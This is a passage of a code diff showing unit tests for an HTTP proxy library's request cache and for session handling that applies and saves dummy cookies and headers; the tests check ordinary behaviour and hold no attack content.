cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
def test_req_ids_unmangled():
reqs = gen_reqs(5)
cache = RequestCache(3)
reqs[0].unmangled = reqs[4]
cache.add(reqs[0])
cache.add(reqs[4])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
assert cache.req_ids(include_unmangled=True) == ['4', '3', '2', '5', '1']

View file

@ -1,119 +0,0 @@
import pytest
from pappyproxy.session import Session
from pappyproxy.http import Request, Response, ResponseCookie
@pytest.fixture
def req():
r = Request()
r.start_line = 'GET / HTTP/1.1'
return r
@pytest.fixture
def rsp():
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
return r
def test_session_basic(req, rsp):
s = Session(
cookie_vals={'session':'foo'},
header_vals={'auth':'bar'},
)
assert 'session' not in req.cookies
assert 'session' not in rsp.cookies
assert 'auth' not in req.headers
assert 'auth' not in rsp.headers
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].cookie_str == 'session=foo'
assert req.headers['auth'] == 'bar'
assert 'auth' not in rsp.headers
def test_session_cookieobj_basic(req, rsp):
s = Session(
cookie_vals={'session':ResponseCookie('session=foo; secure; httponly; path=/')},
header_vals={'auth':'bar'},
)
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].key == 'session'
assert rsp.cookies['session'].val == 'foo'
assert rsp.cookies['session'].secure
assert rsp.cookies['session'].http_only
assert rsp.cookies['session'].path == '/'
assert req.headers['auth'] == 'bar'
assert 'auth' not in rsp.headers
def test_session_save_req(req):
req.headers['BasicAuth'] = 'asdfasdf'
req.headers['Host'] = 'www.myfavoritecolor.foobar'
req.cookies['session'] = 'foobar'
req.cookies['favorite_color'] = 'blue'
s = Session()
s.save_req(req, ['session'], ['BasicAuth'])
assert s.cookies == ['session']
assert s.headers == ['BasicAuth']
assert s.cookie_vals['session'].val == 'foobar'
assert s.header_vals['BasicAuth'] == 'asdfasdf'
assert 'Host' not in s.headers
assert 'favorite_color' not in s.cookies
def test_session_save_rsp(rsp):
rsp.headers['BasicAuth'] = 'asdfasdf'
rsp.headers['Host'] = 'www.myfavoritecolor.foobar'
rsp.set_cookie(ResponseCookie('session=foobar; secure; path=/'))
rsp.set_cookie(ResponseCookie('favorite_color=blue; secure; path=/'))
s = Session()
s.save_rsp(rsp, ['session'])
assert s.cookies == ['session']
assert s.headers == []
assert s.cookie_vals['session'].key == 'session'
assert s.cookie_vals['session'].val == 'foobar'
assert s.cookie_vals['session'].path == '/'
assert s.cookie_vals['session'].secure
def test_session_mixed(req, rsp):
s = Session(
cookie_names=['session', 'state'],
cookie_vals={'session':ResponseCookie('session=foo; secure; httponly; path=/')},
header_vals={'auth':'bar'},
)
s.apply_req(req)
s.apply_rsp(rsp)
assert req.cookies['session'] == 'foo'
assert rsp.cookies['session'].key == 'session'
assert rsp.cookies['session'].val == 'foo'
assert rsp.cookies['session'].secure
assert rsp.cookies['session'].http_only
assert rsp.cookies['session'].path == '/'
assert 'auth' not in rsp.headers
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
r.set_cookie(ResponseCookie('state=bazzers'))
r.set_cookie(ResponseCookie('session=buzzers'))
s.save_rsp(r)
assert s.cookie_vals['session'].val == 'buzzers'
assert s.cookie_vals['state'].val == 'bazzers'
def test_session_save_all(req, rsp):
s = Session()
rsp.set_cookie(ResponseCookie('state=bazzers'))
rsp.set_cookie(ResponseCookie('session=buzzers'))
s.save_rsp(rsp, save_all=True)
assert s.cookies == ['state', 'session']
assert not 'state' in req.cookies
assert not 'session' in req.cookies
s.apply_req(req)
assert req.cookies['state'] == 'bazzers'
assert req.cookies['session'] == 'buzzers'

Some files were not shown because too many files have changed in this diff Show more